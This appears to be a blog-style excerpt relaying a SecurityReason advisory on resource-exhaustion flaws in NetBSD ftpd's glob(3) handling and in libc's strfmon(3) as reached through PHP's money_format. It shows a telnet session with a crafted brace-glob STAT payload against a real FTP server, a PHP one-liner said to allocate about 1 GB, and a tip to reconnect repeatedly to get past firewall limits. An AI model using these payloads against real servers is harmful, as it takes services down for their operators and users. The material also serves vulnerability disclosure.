From SecurityReasons we get the fully documented explanation.
But lets see an example:
Example:
> telnet ftp.netbsd.org 21
Trying 204.152.190.15…
Connected to ftp.netbsd.org.
Escape character is ‘^]’.
220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20100320) ready.
user anonymous
331 Guest login ok, type your name as password.
pass anon@cxib
230-
The NetBSD Project FTP Server located in Redwood City, CA, USA
…
230-
EXPORT NOTICE
…
230 Guest login ok, access restrictions apply.
stat
{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}
/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx
this request will generate 100% usage of process a long time. ftpd come
into glob(3) and will not fast out. Very similar sympthon was described in
vulnerability for glibc strfmon(3)
– – http://securityreason.com/achievement_securityalert/67 —
…
Interesting is that the PHP memory_limit has no control over what will
happens in the level of the libc. Function strfmon(3) can allocate a lot
of
data in memory without control by PHP memory_limit.
For example:
php -r ‘money_format(“%.1343741821i”,1);’
will allocate ~1049MB real memory.
memory_limit can be less that 1049M
…
– – http://securityreason.com/achievement_securityalert/67 —
ftpd also dosen’t control what will happen in libc.
so it is enough to send
– —
USER anonymous
PASS
STAT */..[calculated pattern]
– —
and disconnect to connect again (bypass firewall limits). In php we can
also bypass max_memory_limit by libc vulns.
Attacking machine in this way, we can call the various side effects.